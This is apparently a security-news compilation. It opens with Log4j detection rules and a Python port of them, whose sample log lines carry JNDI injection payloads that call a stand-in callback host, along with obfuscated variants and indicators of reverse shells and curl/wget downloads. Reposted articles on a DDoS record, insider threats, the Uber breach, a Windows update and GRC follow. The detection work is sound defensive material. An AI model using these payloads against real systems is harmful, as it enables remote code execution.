$ = {22 2F 42 61 73 69 63 2F 57 65 62 6C 6F 67 69 63 4D 65 6D 73 68 65 6C 6C 22}
$ = {22 2F 42 61 73 69 63 2F 4A 42 6F 73 73 4D 65 6D 73 68 65 6C 6C 22}
$ = {22 2F 42 61 73 69 63 2F 57 65 62 73 70 68 65 72 65 4D 65 6D 73 68 65 6C 6C 22}
$ = {22 2F 42 61 73 69 63 2F 53 70 72 69 6E 67 4D 65 6D 73 68 65 6C 6C 22}
$ = {22 2F 44 65 73 65 72 69 61 6C 69 7A 61 74 69 6F 6E 2F 55 52 4C 44 4E 53 2F 22}
$ = {22 2F 44 65 73 65 72 69 61 6C 69 7A 61 74 69 6F 6E 2F 43 6F 6D 6D 6F 6E 73 43 6F 6C 6C 65 63 74 69 6F 6E 73 31 2F 44 6E 73 6C 6F 67 2F 22}
$ = {22 2F 44 65 73 65 72 69 61 6C 69 7A 61 74 69 6F 6E 2F 43 6F 6D 6D 6F 6E 73 43 6F 6C 6C 65 63 74 69 6F 6E 73 32 2F 43 6F 6D 6D 61 6E 64 2F 42 61 73 65 36 34 2F 22}
$ = {22 2F 44 65 73 65 72 69 61 6C 69 7A 61 74 69 6F 6E 2F 43 6F 6D 6D 6F 6E 73 42 65 61 6E 75 74 69 6C 73 31 2F 52 65 76 65 72 73 65 53 68 65 6C 6C 2F 22}
$ = {22 2F 44 65 73 65 72 69 61 6C 69 7A 61 74 69 6F 6E 2F 4A 72 65 38 75 32 30 2F 54 6F 6D 63 61 74 4D 65 6D 73 68 65 6C 6C 22}
$ = {22 2F 54 6F 6D 63 61 74 42 79 70 61 73 73 2F 44 6E 73 6C 6F 67 2F 22}
$ = {22 2F 54 6F 6D 63 61 74 42 79 70 61 73 73 2F 43 6F 6D 6D 61 6E 64 2F 22}
$ = {22 2F 54 6F 6D 63 61 74 42 79 70 61 73 73 2F 52 65 76 65 72 73 65 53 68 65 6C 6C 2F 22}
$ = {22 2F 54 6F 6D 63 61 74 42 79 70 61 73 73 2F 54 6F 6D 63 61 74 4D 65 6D 73 68 65 6C 6C 22}
$ = {22 2F 54 6F 6D 63 61 74 42 79 70 61 73 73 2F 53 70 72 69 6E 67 4D 65 6D 73 68 65 6C 6C 22}
$ = {22 2F 47 72 6F 6F 76 79 42 79 70 61 73 73 2F 43 6F 6D 6D 61 6E 64 2F 22}
$ = {22 2F 57 65 62 73 70 68 65 72 65 42 79 70 61 73 73 2F 55 70 6C 6F 61 64 2F 22}
condition:
1 of them
}
rule EXPL_Log4j_CVE_2021_44228_JAVA_Exception_Dec21_1 {
strings:
$xa1 = {22 68 65 61 64 65 72 20 77 69 74 68 20 76 61 6C 75 65 20 6F 66 20 42 61 64 41 74 74 72 69 62 75 74 65 56 61 6C 75 65 45 78 63 65 70 74 69 6F 6E 3A 20 22}
$sa1 = {22 2E 6C 6F 67 34 6A 2E 63 6F 72 65 2E 6E 65 74 2E 4A 6E 64 69 4D 61 6E 61 67 65 72 2E 6C 6F 6F 6B 75 70 28 4A 6E 64 69 4D 61 6E 61 67 65 72 22}
$sa2 = {22 45 72 72 6F 72 20 6C 6F 6F 6B 69 6E 67 20 75 70 20 4A 4E 44 49 20 72 65 73 6F 75 72 63 65 22}
condition:
$xa1 or all of ($sa*)
}
rule EXPL_Log4j_CVE_2021_44228_Dec21_Soft {
strings:
$ = {22 24 7B 6A 6E 64 69 3A 6C 64 61 70 3A 2F 22}
$ = {22 24 7B 6A 6E 64 69 3A 72 6D 69 3A 2F 22}
$ = {22 24 7B 6A 6E 64 69 3A 6C 64 61 70 73 3A 2F 22}
$ = {22 24 7B 6A 6E 64 69 3A 64 6E 73 3A 2F 22}
$ = {22 24 7B 6A 6E 64 69 3A 69 69 6F 70 3A 2F 22}
$ = {22 24 7B 6A 6E 64 69 3A 68 74 74 70 3A 2F 22}
$ = {22 24 7B 6A 6E 64 69 3A 6E 69 73 3A 2F 22}
$ = {22 24 7B 6A 6E 64 69 3A 6E 64 73 3A 2F 22}
$ = {22 24 7B 6A 6E 64 69 3A 63 6F 72 62 61 3A 2F 22}
condition:
1 of them
}
rule EXPL_Log4j_CVE_2021_44228_Dec21_OBFUSC {
strings:
$x1 = {22 24 25 37 42 6A 6E 64 69 3A 22}
$x2 = {22 25 32 35 32 34 25 32 35 37 42 6A 6E 64 69 22}
$x3 = {22 25 32 46 25 32 35 32 35 32 34 25 32 35 32 35 37 42 6A 6E 64 69 25 33 41 22}
$x4 = {22 24 7B 6A 6E 64 69 3A 24 7B 6C 6F 77 65 72 3A 22}
$x5 = {22 24 7B 3A 3A 2D 6A 7D 24 7B 22}
condition:
1 of them
}
rule EXPL_Log4j_CVE_2021_44228_Dec21_Hard {
strings:
$x1 = /\$\{jndi:(ldap|ldaps|rmi|dns|iiop|http|nis|nds|corba):\/[\/]?[a-z-\.0-9]{3,120}:[0-9]{2,5}\/[a-zA-Z\.]{1,32}\}/
$fp1r = /(ldap|rmi|ldaps|dns):\/[\/]?(127\.0\.0\.1|192\.168\.|172\.[1-3][0-9]\.|10\.)/
condition:
$x1 and not 1 of ($fp*)
}
rule SUSP_Base64_Encoded_Exploit_Indicators_Dec21 {
strings:
/* curl -s */
$sa1 = {22 59 33 56 79 62 43 41 74 63 79 22}
$sa2 = {22 4E 31 63 6D 77 67 4C 58 4D 67 22}
$sa3 = {22 6A 64 58 4A 73 49 43 31 7A 49 22}
/* |wget -q -O- */
$sb1 = {22 66 48 64 6E 5A 58 51 67 4C 58 45 67 4C 55 38 74 49 22}
$sb2 = {22 78 33 5A 32 56 30 49 43 31 78 49 43 31 50 4C 53 22}
$sb3 = {22 38 64 32 64 6C 64 43 41 74 63 53 41 74 54 79 30 67 22}
condition:
1 of ($sa*) and 1 of ($sb*)
}
rule SUSP_JDNIExploit_Indicators_Dec21 {
strings:
$xr1 = /(ldap|ldaps|rmi|dns|iiop|http|nis|nds|corba):\/\/[a-zA-Z0-9\.]{7,80}:[0-9]{2,5}\/(Basic\/Command\/Base64|Basic\/ReverseShell|Basic\/TomcatMemshell|Basic\/JBossMemshell|Basic\/WebsphereMemshell|Basic\/SpringMemshell|Basic\/Command|Deserialization\/CommonsCollectionsK|Deserialization\/CommonsBeanutils|Deserialization\/Jre8u20\/TomcatMemshell|Deserialization\/CVE_2020_2555\/WeblogicMemshell|TomcatBypass|GroovyBypass|WebsphereBypass)\//
condition:
filesize < 100MB and $xr1
}
rule SUSP_EXPL_OBFUSC_Dec21_1{
strings:
/* ${lower:X} - single character match */
$ = { 24 7B 6C 6F 77 65 72 3A ?? 7D }
/* ${upper:X} - single character match */
$ = { 24 7B 75 70 70 65 72 3A ?? 7D }
/* URL encoded lower - obfuscation in URL */
$ = {22 24 25 37 62 6C 6F 77 65 72 3A 22}
$ = {22 24 25 37 62 75 70 70 65 72 3A 22}
$ = {22 25 32 34 25 37 62 6A 6E 64 69 3A 22}
$ = {22 24 25 37 42 6C 6F 77 65 72 3A 22}
$ = {22 24 25 37 42 75 70 70 65 72 3A 22}
$ = {22 25 32 34 25 37 42 6A 6E 64 69 3A 22}
condition:
1 of them
}"
AND count > 0 AND path NOT LIKE "/var/log/gc%"
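As an added example (not part of the Akamai post or the Insight query above), the Hard, Soft and two obfuscation rules from Query 2 ported to Python regular expressions and run over a few constructed web-server log lines, so the false-positive exclusion for private callback addresses can be seen working. The hex strings are decoded to plain text without the enclosing 0x22 quote bytes so that they match unquoted log text; the hostnames, addresses and timestamps in the sample are made up.

```python
import re

# Positive pattern ($x1) and private-address exclusion ($fp1r) from
# rule EXPL_Log4j_CVE_2021_44228_Dec21_Hard, as Python regexes.
JNDI_HARD = re.compile(
    r"\$\{jndi:(ldap|ldaps|rmi|dns|iiop|http|nis|nds|corba):/[/]?"
    r"[a-z\-.0-9]{3,120}:[0-9]{2,5}/[a-zA-Z.]{1,32}\}"
)
PRIVATE_CALLBACK = re.compile(
    r"(ldap|rmi|ldaps|dns):/[/]?(127\.0\.0\.1|192\.168\.|172\.[1-3][0-9]\.|10\.)"
)

# Hex strings of EXPL_Log4j_CVE_2021_44228_Dec21_Soft decoded to text
# (quote bytes dropped).
SOFT_MARKERS = [
    "${jndi:ldap:/", "${jndi:rmi:/", "${jndi:ldaps:/", "${jndi:dns:/",
    "${jndi:iiop:/", "${jndi:http:/", "${jndi:nis:/", "${jndi:nds:/",
    "${jndi:corba:/",
]

# Hex strings of EXPL_Log4j_CVE_2021_44228_Dec21_OBFUSC decoded to text.
OBFUSC_MARKERS = [
    "$%7Bjndi:", "%2524%257Bjndi", "%2F%252524%25257Bjndi%3A",
    "${jndi:${lower:", "${::-j}${",
]

# SUSP_EXPL_OBFUSC_Dec21_1: the two wildcard byte patterns become a regex
# with a single-character wildcard; the URL-encoded markers are decoded.
SUSP_SINGLE_CHAR = re.compile(r"\$\{(lower|upper):.\}")
SUSP_URL_MARKERS = [
    "$%7blower:", "$%7bupper:", "%24%7bjndi:",
    "$%7Blower:", "$%7Bupper:", "%24%7Bjndi:",
]


def classify_line(line: str) -> list[str]:
    """Return the names of the ported rules that fire on one log line."""
    hits = []
    # Hard: "$x1 and not 1 of ($fp*)"
    if JNDI_HARD.search(line) and not PRIVATE_CALLBACK.search(line):
        hits.append("Hard")
    if any(m in line for m in SOFT_MARKERS):
        hits.append("Soft")
    if any(m in line for m in OBFUSC_MARKERS):
        hits.append("OBFUSC")
    if SUSP_SINGLE_CHAR.search(line) or any(m in line for m in SUSP_URL_MARKERS):
        hits.append("SUSP_OBFUSC")
    return hits


def scan_log(text: str) -> list[tuple[int, list[str]]]:
    """Scan a log file body; return (line number, rule names) for each hit."""
    results = []
    for number, line in enumerate(text.splitlines(), start=1):
        hits = classify_line(line)
        if hits:
            results.append((number, hits))
    return results


# Constructed sample log (hostnames, addresses and times are made up).
# Line 2: plain lookup to an external host -> Hard and Soft fire.
# Line 3: lookup to a private address -> Hard is suppressed by $fp1r, Soft still fires.
# Line 4: ${lower:} obfuscation defeats the Hard regex -> only the obfuscation rules fire.
# Line 5: double URL-encoded prefix in the query string -> OBFUSC fires.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Dec/2021:10:00:02 +0000] "GET /login HTTP/1.1" 200 128 "-" "${jndi:ldap://callback.example.net:1389/a}"
10.0.0.5 - - [10/Dec/2021:10:00:03 +0000] "GET /login HTTP/1.1" 200 128 "-" "${jndi:ldap://192.168.1.10:1389/a}"
10.0.0.5 - - [10/Dec/2021:10:00:04 +0000] "GET /login HTTP/1.1" 200 128 "-" "${jndi:${lower:l}dap://callback.example.net:1389/a}"
10.0.0.5 - - [10/Dec/2021:10:00:05 +0000] "GET /?q=%2524%257Bjndi HTTP/1.1" 400 0 "-" "curl/7.68"
"""

if __name__ == "__main__":
    for number, hits in scan_log(SAMPLE_LOG):
        print(f"line {number}: {', '.join(hits)}")
```

Line 3 shows why the page says a negative result is not conclusive: the Hard rule deliberately ignores callbacks to private ranges, so only the weaker Soft rule reports it.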

Source :
https://www.akamai.com/blog/security/recommendations-for-log4j-mitigation

Record-Breaking DDoS Attack in Europe

They’re back! 

Or, more accurately, the cybercriminals responsible for July’s record-setting European DDoS attack may have never left. In the weeks following our coverage of the previous incident, the victim (a customer based in Eastern Europe) has been bombarded relentlessly with sophisticated distributed denial-of-service (DDoS) attacks, ultimately paving the way for a new European packets per second (pps) DDoS record.

On Monday, September 12, 2022, Akamai successfully detected and mitigated the now-largest DDoS attack ever launched against a European customer on the Prolexic platform, with attack traffic abruptly spiking to 704.8 Mpps in an aggressive attempt to cripple the organization’s business operations.

Attack breakdown

Adversaries are constantly evolving their techniques, tactics, and procedures to evade detection and maximize disruption, as demonstrated by this ongoing attack campaign. Let’s break down and compare the two record-setting events. 

                          July Attack          September Attack
Peak pps                  659.6 Mpps           704.8 Mpps
Cumulative attacks        75                   201
IPs targeted              512                  1,813
Vector                    UDP                  UDP
Distribution              1 location           6 locations
Date of attack            July 21, 2022        September 12, 2022
Top scrubbing locations   HKG, LON, TYO        HKG, TYO, LON

Prior to June 2022, this customer only saw attack traffic against its primary data center; however, they recognized the importance of a comprehensive defensive strategy early on, and onboarded their 12 remaining global data centers to the Prolexic platform for peace of mind. This proved highly fortuitous, as the attack campaign expanded unexpectedly, hitting six different global locations, from Europe to North America. These events reflect a growing trend in which adversaries are increasingly hitting deep-reconnaissance targets

Attack mitigation

To thwart an attack of this magnitude and complexity, Akamai leveraged a balanced combination of automated and human mitigation: 99.8% of the assault was pre-mitigated thanks to the customer’s proactive defensive posture, a preemptive security measure implemented by the Akamai Security Operations Command Center (SOCC). Remaining attack traffic and follow-up attacks leveraging different vectors were swiftly mitigated by our frontline security responders. In the wake of increasingly sophisticated DDoS attacks worldwide, many businesses struggle with the staffing of internal security resources, and instead look to Akamai’s SOCC to augment and act as an extension of their incident response team.

The attackers’ command and control system had no delay in activating the multidestination attack, which escalated in 60 seconds from 100 to 1,813 IPs active per minute. Those IPs were spread across eight distinct subnets in six distinct locations. An attack this heavily distributed could drown an underprepared security team in alerts, making it difficult to assess the severity and scope of the intrusion, let alone fight the attack. Sean Lyons, Senior Vice President and General Manager of Infrastructure Security, says, “Akamai Prolexic’s DDoS specialization culture, focus on customer infrastructure designs and history are rooted in defending the most complex, multifaceted attacks, and our platform is equipped with purpose-built tooling for rapid threat mitigation, even in the ‘fog of war.’”

Distinct IP Count Per Minute.

Conclusion

Having a proven DDoS mitigation strategy and platform in place is imperative for shielding your business from downtime and disruption. Learn more about Akamai’s industry-leading DDoS solutions and how our advanced attack-fighting capabilities keep organizations safe from increasingly sophisticated threats.

Guidance on minimizing DDoS risk

  • Immediately review and implement Cybersecurity and Infrastructure Security Agency (CISA) recommendations. 
  • Review critical subnets and IP spaces, and ensure that they have mitigation controls in place.
  • Deploy DDoS security controls in an always-on mitigation posture as a first layer of defense, to avoid an emergency integration scenario and to reduce the burden on incident responders. If you don’t have a trusted and proven cloud-based provider, get one now. 
  • Proactively pull together a crisis response team and ensure runbooks and incident response plans are up-to-date. For example, do you have a runbook to deal with catastrophic events? Are the contacts within the playbooks updated? A playbook that references outdated tech assets or people who have long left the company isn’t going to help.

For additional information on the steps you can take to protect your organization, please visit the following CISA resources:

5 Ways to Mitigate Your New Insider Threats in the Great Resignation

Companies are in the midst of an employee “turnover tsunami” with no signs of a slowdown. According to Fortune Magazine, 40% of the U.S. is considering quitting their jobs. This trend – coined the great resignation – creates instability in organizations. High employee turnover increases security risks, and companies are more vulnerable to attacks from human factors worldwide.

At Davos 2022, statistics connect the turmoil of the great resignation to the rise of new insider threats. Security teams are feeling the impact. It’s even harder to keep up with your employee security. Companies need a fresh approach to close the gaps and prevent attacks. This article will examine what your security teams must do within the new organizational dynamics to quickly and effectively address unique challenges.

Handling Your New Insider Threats

Implementing a successful security awareness program is more challenging than ever for your security team—the new blood coming in causes cultural dissonance. Every new employee brings their own security habits, behavior, and ways of work. Changing habits is slow. Yet, companies don’t have the luxury of time. They must get ahead of hackers to prevent attacks from new insider threats.

Be sure to handle your organization’s security high-impact risks:

  • Prevent data loss – When employees leave, there’s a high risk of sensitive data leaks. Manage off-boarding and close lurking dormant emails to prevent data loss.
  • Maintain best practices – When new employees join the organization, even if security training is well conducted, they’re not on par with their peers. Unknown security habits may put the organization at risk.
  • Ensure friendly reminders – With less staff, employees are overburdened and pressured. Security may be “forgotten” or neglected in the process.
  • Support remote work – To support rapid employee recruitment, working at home is a must. Remote work flexibility helps to attract and retain new employees.
  • Train on the go – Remote work requires securing remote devices and dealing with new employee behavior for inherent distractions – on the go and at home.

5 Preventive Measures for High Impact in Your Organization

Security teams must protect companies against new phishing attempts within the high workforce flux. Practical security training is key to countering hackers. New techniques and practices are required to support remote work and new behavioral challenges, especially during times of high employee turnover. To succeed, your training must keep cyber awareness fresh for all staff. It must genuinely transform the behavior of your new employees.

Here are five preventive measures to effectively protect your organization for cyber resilience:

Ensure all staff get continuous training

Security risks are constantly evolving and ever-present. All employees are needed to protect against sophisticated phishing threats. It’s even more complicated in the great resignation. With new weak links, your company is at the greatest risk. Gullible employees leave security ‘holes’ in your organization’s front line. Security teams are well aware of the risks.

Research shows that companies must continuously train 100% of their staff every month. Yet, employees spend little time thinking about security.

Automated security awareness training like CybeReady makes it easier to manage security training for all your staff.

  • Instead of manual work, use new, in-depth BI data and reports to guide your training plan for new and experienced employees.
  • Adjust difficulty level to the role, geography, and risk, to flexibly control your diverse employee needs and vulnerabilities.
  • Raise employee awareness of threats.
  • Prevent hacker exploitation and emergency triage with company leadership.

Target new employees

Your security depends on employee help and cooperation. Build best practices on the job. Threat basics aren’t enough to stop malicious actors. Whether in the office or working remotely, security training must foster mastery. Start with low difficulty. Create a foundation. Continually promote learning to the next level. You must understand and cater to your employee’s needs and way of work for effectiveness.

Simply sending out emails to employees is not enough for a robust learning experience. With security awareness platforms like CybeReady, training becomes more scientific for continuous, accurate analysis of your security awareness.

  • Adjust your training simulations to employee contexts and frequency for mastery.
  • Set difficulty level depending on employee behavior and results.
  • Use intensive, bite-size intervals for success.
  • By varying attack scenarios, new employees get proper onboarding.
  • Put security on the top of the mind of all your staff.

Prioritize your highest risk groups

For a cyber awareness training program to be successful, security teams must plan, operate, evaluate and adapt accordingly. Forecasting actual difficulty and targeting groups can be complex. Security teams must determine future attack campaigns based on employee behavior and address challenges in a given scenario.

With data-driven platforms like CybeReady, your security teams monitor campaign performance to fine-tune employee defense.

  • Build custom high-intensity training campaigns for your high-risk groups.
  • Focus on specific challenges for concrete results, such as:
    1) Password and data requests
    2) Messages from seemingly legitimate senders and sources
    3) Realistic content tailored to a specific department or role

  • Adapt your training for both individuals and attack vectors while respecting employee privacy.
  • Shift problematic group behavior to best practices.

Keep busy staff vigilant

Security is 24/7. Keep your training unpredictable to maintain employee vigilance. Send surprising simulation campaigns in a continuous cycle. Catch employees off guard for the best learning. To create high engagement, ensure your training content is relevant to daily actions. Use short, frequent, and intriguing content in their own language. Tailor to local references and current news.

With scientific, data-based simulations like CybeReady, companies mimic the rapidly changing attack environment – plus, tick all your compliance boxes for a complete solution. Stay abreast of evolving global phishing trends as they vary around the world. Focus all your employees on the attacker styles and scenarios most popular in their geographies and languages. Adjust frequency to personal and group risk.

Ensure long-term results for every employee

Take advantage of the ‘golden moment.’ Just-in-time learning is the key to the most effective results. Instead of random enforcement training often irrelevant to employees, make a lasting impression right when mistakes happen. Ensure that your training uses this limited window of time. People are likelier to remember the experience and change behavior the next time.

With data science-driven cyber security training platforms like CybeReady, security teams seize the moment of failure for long-term results. With just-in-time learning, employees immediately get training on mistakes made upon falling for a simulation. They retain critical knowledge and respond better in future attack scenarios. With a new awareness of risks, transform learning into new behaviors.

Cutting Your Security Risks with a New Level of Employee Awareness

In global organizations today, seamlessly integrating the latest security know-how into everyday work is a must to counter the new risks of the great resignation. It’s more important than ever for every employee to get up to speed for high cyber resilience quickly.

Download the CybeReady Playbook to learn how CybeReady’s fully automated security awareness training platform provides the fast, concrete results you need with virtually zero IT effort, or schedule a product demo with one of our experts.

Source :
https://thehackernews.com/2022/09/5-ways-to-mitigate-your-new-insider.html

Uber Says It’s Investigating a Potential Breach of Its Computer Systems

Ride hailing giant Uber disclosed Thursday it’s responding to a cybersecurity incident involving a breach of its network and that it’s in touch with law enforcement authorities.

The New York Times first reported the incident. The company pointed to its tweeted statement when asked for comment on the matter.

The hack is said to have forced the company to take its internal communications and engineering systems offline as it investigated the extent of the breach.

The publication said the malicious intruder compromised an employee’s Slack account and leveraged it to broadcast a message that the company had “suffered a data breach,” in addition to listing internal databases that are supposed to have been compromised.

“It appeared that the hacker was later able to gain access to other internal systems, posting an explicit photo on an internal information page for employees,” the New York Times said.

Uber has yet to offer additional details about the incident, but it seems that the hacker, believed to be 18 years old, social-engineered the employee to get hold of their password by masquerading as a corporate IT person and used it to obtain a foothold in the internal network.

Although the account was secured with two-factor authentication (2FA) protections, the hacker is alleged to have spammed the employee with push notifications and also contacted the person on WhatsApp, asking to accept the request by claiming to be from Uber’s IT department.

The incident is reminiscent of the recently disclosed Cisco hack wherein the cybercriminal actors resorted to the technique of prompt bombing to achieve a 2FA push acceptance.

“Once on the internal network, the attackers found high privileged credentials laying on a network file share and used them to access everything, including production systems, corp EDR console, [and] Uber slack management interface,” Kevin Reed, chief information security officer at Acronis, told The Hacker News.

This is not Uber’s first breach. It came under scrutiny for failing to properly disclose a 2016 data breach affecting 57 million riders and drivers, and ultimately paying off the hackers $100,000 to hide the breach. It became public knowledge only in late 2017.

Federal prosecutors in the U.S. have since charged its former security officer, Joe Sullivan, with an alleged attempted cover-up of the incident, stating he had “instructed his team to keep knowledge of the 2016 breach tightly controlled.” Sullivan has contested the accusations.

In December 2021, Sullivan was handed three additional counts of wire fraud on top of the previously filed felony obstruction and misprision charges. “Sullivan allegedly orchestrated the disbursement of a six-figure payment to two hackers in exchange for their silence about the hack,” the superseding indictment said.

It further said he “took deliberate steps to prevent persons whose PII was stolen from discovering that the hack had occurred and took steps to conceal, deflect, and mislead the U.S. Federal Trade Commission (FTC) about the data breach.”

The latest breach also comes as the criminal case against Sullivan went to trial in the U.S. District Court in San Francisco.

“The compromise is certainly bigger compared to the breach in 2016,” Reed said. “Whatever data Uber keeps, the hackers most probably already have access to it.”

Source :
https://thehackernews.com/2022/09/uber-says-its-investigating-potential.html

Windows 11 KB5017328 update fixes USB printing, audio headset issues

Microsoft has released the Windows 11 KB5017328 cumulative update with security updates and improvements, including USB printing and Bluetooth headsets fixes.

KB5017328 is a mandatory cumulative update containing the September 2022 Patch Tuesday security updates for vulnerabilities discovered in previous months.

Windows 11 KB5017328 cumulative update

Windows 11 users can install today’s update by going to Start > Settings > Windows Update and clicking on ‘Check for Updates.’

Windows 11 users can also manually download and install the KB5017328 preview update from the Microsoft Update Catalog.

What’s new in the Windows 11 KB5017328 update

After installing today’s non-security update, Windows 11 will have its build number changed to 22000.978.

The Windows 11 KB5017328 cumulative update includes approximately 25 improvements and fixes, with the highlighted fixes listed below:

  • USB printers that might have malfunctioned when you restarted your device or reinstalled them now work as expected.
  • Microsoft fixed a Windows 11 SE issue that displayed trust errors when attempting to install apps from the Microsoft Store.
  • Microsoft fixed an issue where Bluetooth audio headsets stopped playing audio after adjusting the progress bar.
  • Microsoft addressed a Microsoft Edge IE mode issue that prevented users from interacting with dialog boxes.
  • Fixed a bug that prevented Windows from displaying Microsoft account (MSA) login forms after installing the KB5016691 update.

In addition to these issues, Microsoft also fixed eighteen other bugs, as explained in the August KB5016691 preview update.

Source:
https://www.bleepingcomputer.com/news/microsoft/windows-11-kb5017328-update-fixes-usb-printing-audio-headset-issues/

How GRC protects the value of organizations — A simple guide to data quality and integrity

Contemporary organizations understand the importance of data and its impact on improving interactions with customers, offering quality products or services, and building loyalty.

Data is fundamental to business success. It allows companies to make the right decisions at the right time and deliver the high-quality, personalized products and services that customers expect.

There is a challenge, though.

Businesses are collecting more data than ever before, and new technologies have accelerated this process dramatically. As a result, organizations have significant volumes of data, making it hard to manage, protect, and get value from it.

Here is where Governance, Risk, and Compliance (GRC) comes in. GRC enables companies to define and implement the best practices, procedures, and governance to ensure the data is clean, safe, and reliable across the board.

More importantly, organizations can use GRC platforms like StandardFusion to create an organizational culture around security. The objective is to encourage everyone to understand how their actions affect the business’s success.

Now, the big question is:

Are organizations getting value from their data?

To answer that, first, it’s important to understand the following two concepts.

Data quality

Data quality represents how reliable the information serves an organization’s specific needs — mainly supporting decision-making.

Some of these needs might be:

  • Operations – Where and how can we be more efficient?
  • Resource distribution – Do we have any excess? Where? And why?
  • Planning – How likely is this scenario to occur? What can we do about it?
  • Management – What methods are working? What processes need improvement?

From a GRC standpoint, companies can achieve data quality by creating rules and policies so the entire organization can use that data in the same ways. These policies could, for example, define how to label, transfer, process, and maintain information.

Data Integrity

Data integrity focuses on the trustworthiness of the information in terms of its physical and logical validity. Some of the key characteristics to ensure the usability of data are:

  • Consistency
  • Accuracy
  • Validity
  • Truthfulness

GRC’s goal for data integrity is to keep the information reliable by eliminating unwanted changes between updates or modifications. It is all about the data’s accuracy, availability, and trust.

How GRC empowers organizations to achieve high-quality data

Organizations that want to leverage their data to generate value must ensure the information they collect is helpful and truthful. The following are the key characteristics of high-quality data:

  • Completeness: The expected data to make decisions is present.
  • Uniqueness: There is no duplication of data.
  • Timeliness: The data is up-to-date and available to use when needed.
  • Validity: The information has the proper format and matches the requirements.
  • Accuracy: The data describes the object correctly in a real-world context.
  • Consistency: The data must be the same across multiple databases.

A powerful way to make sure the company’s data maintains these six characteristics is by leveraging the power of GRC.

Why?

Because GRC empowers organizations to set standards, regulations, and security controls that avoid mistakes, standardize tasks, and guide personnel when collecting and dealing with vital information.

GRC helps organizations answer the following questions:

  • How is the company ensuring that data is available for internal decisions and for clients?
  • Is everyone taking the proper steps to collect and process data?
  • Have redundancies been removed?
  • Is the organization prepared for unexpected events?
  • Does the organization have a backup system?
  • Are the key processes standardized?

Overall, GRC aims to build shared attitudes and actions towards security.

Why every organization needs high-quality data and how GRC helps

Unless the data companies collect is high-quality and trustworthy, there’s no value in it — it becomes a liability and a risk for the organization.

Modern companies recognize data as an essential asset that impacts their bottom line. Furthermore, they understand that poor data quality can damage credibility, reduce sales, and minimize growth.

In today’s world, organizations are aiming to be data-driven. However, becoming a data-driven organization is tough without a GRC program.

How so?

Governance, Risk, and Compliance enable organizations to protect and manage data quality by creating standardized, controlled, and repeatable processes. This is key because every piece of data an organization processes has an associated risk.

By understanding these risks, companies can implement the necessary controls and policies for handling and extracting data correctly so that every department can access the same quality information.

Organizations without structured data can’t provide any value, and they face the following risks:

  • Missed opportunities: Many leads are lost because of incomplete or inaccurate data. Also, incorrect data means wrong insights, resulting in missing critical business opportunities.
  • Lost revenue: According to Gartner’s 2021 research, the average financial impact of poor data quality on organizations is $12.9 million annually.
  • Poor customer experience: When data quality is poor, organizations can’t identify customers’ pain points and preferences. As a result, the offer of products or services doesn’t match customers’ needs and expectations.
  • Lack of compliance: In some industries where regulations control relationships or customer transactions, maintaining good-quality data can be the difference between compliance and fines of millions of dollars. GRC is vital to keep compliance in the loop as new regulations evolve worldwide.
  • Increased expenses: A few years ago, IBM’s research showed that businesses lost 3.1 trillion dollars in the US alone. How? By spending time finding the correct data, fixing errors, and simply hunting for information and confirmed sources.
  • Misanalysis: Around 84% of CEOs are concerned about the quality of data they are deciding on. Wrong data will lead to bad decisions and ultimately damage operations, finances, HR, and every area within the company.
  • Reputational damage: In today’s world, customers spend a lot of their time reading reviews before making a decision. If a company fails to satisfy its customers, everyone will know.
  • Reduced efficiency: Poor data quality forces employees to do manual data quality checks, losing time and money.

To sum up:

Having the right processes to manipulate data will prevent organizations from missing business opportunities, damaging their reputation, and doing unnecessary repetitive tasks.

How GRC supports data-driven business and what are the key benefits of clean data

Data-driven businesses embrace the use of data (and its analysis) to get insights that can improve the organization. The efficient management of big data through GRC tools helps identify new business opportunities, strengthen customer experiences, grow sales, improve operations, and more.

For example, GRC helps data-driven businesses by allowing them to create and manage the right policies to process and protect the company’s data.

More importantly, organizations can also control individual policies to ensure they have been distributed and acknowledged accordingly.

In terms of benefits, although clean data has numerous “easy-to-identify” benefits, many others are not easily identified. Trusting data not just improves efficiency and results; it also helps with fundamental, vital factors that affect business performance and success.

What are these factors?

Fundamental benefits:

  • Profits/Revenue
  • Internal communication
  • Employees’ confidence to share information
  • Company’s reputation
  • Trust

Operational benefits:

  • Efficiency
  • Business outcome
  • Privacy issues
  • Customer satisfaction
  • Better audience-targeting

How GRC protects the value of businesses and their data

In this contemporary world, companies should be measured not only by existing financial metrics but also by the amount of monetizable data they can capture, consume, store, and use, and, more importantly, by how that data helps the organization’s internal processes become faster and more agile.

When people think of high-quality data and big data, they usually associate these two with big organizations, especially technology and social media platforms. However, high-quality big data gives organizations of any size plenty of benefits.

Data quality and integrity help organizations to:

  • Understand their clients
  • Enhance business operations
  • Understand industry best practices
  • Identify the best partnership options
  • Strengthen business culture
  • Deliver better results
  • Make more money

Using the right GRC platform helps companies create and control the policies and practices to ensure their data is valid, consistent, accurate, and complete — allowing them to get all these benefits.

The key to using GRC tools is that businesses can produce what customers expect on a greater scale and with higher precision and velocity.

Now, what does this have to do with value?

By protecting the value of data, organizations are protecting their overall worth. Indeed, GRC empowers companies to create a culture of value, giving everyone education and agency so they can make better decisions.

Also, GRC helps companies tell better security stories. These stories aim to build trust with customers and partners, enter new markets, and shorten sale cycles.

To summarize:

A better understanding of customers and processes — through data — will lead to better products and services, enhanced experiences, and long-lasting relationships with customers. All these represent growth and more revenue for companies.

What happens when a company’s data is not safe? Can it damage their value?

Trust is a vital component of any interaction (business or personal) and, as such, it is mandatory for organizations to protect it — without trust, there is no business.

When data is not protected, the chances of breaches are higher, causing direct and indirect costs.

Direct costs are:

  • Fines
  • Lawsuits
  • Stolen information
  • Compensations
  • Potential business loss

Indirect costs are:

  • Reputation/Trust
  • PR activities
  • Lost revenue from downtime
  • New and better protection

Often, reputation damages can cause long-term harm to organizations, making it hard for them to acquire and maintain business. In fact, reputation loss is the company’s biggest worry, followed by financial costs, system damage, and downtime.

So, what does all this mean?

It’s not just about collecting data; it is also about how companies reduce risks and leverage and protect the data they have. GRC integrates data security, helping organizations be better prepared against unauthorized access, corruption, or theft.

Moreover, GRC tools can help elevate data security by controlling policies, regulations, and predictable issues within the organization.

The bottom line?

When companies can’t get or maintain customers because of a lack of trust, the organization’s value will be significantly lower — or even zero. Unfortunately, this is even more true for small and medium-sized companies.

How to use GRC to achieve and maintain high-quality data?

Many organizations have trouble managing their data, which, unfortunately, leads to poor decisions and a lack of trust from employees and customers.

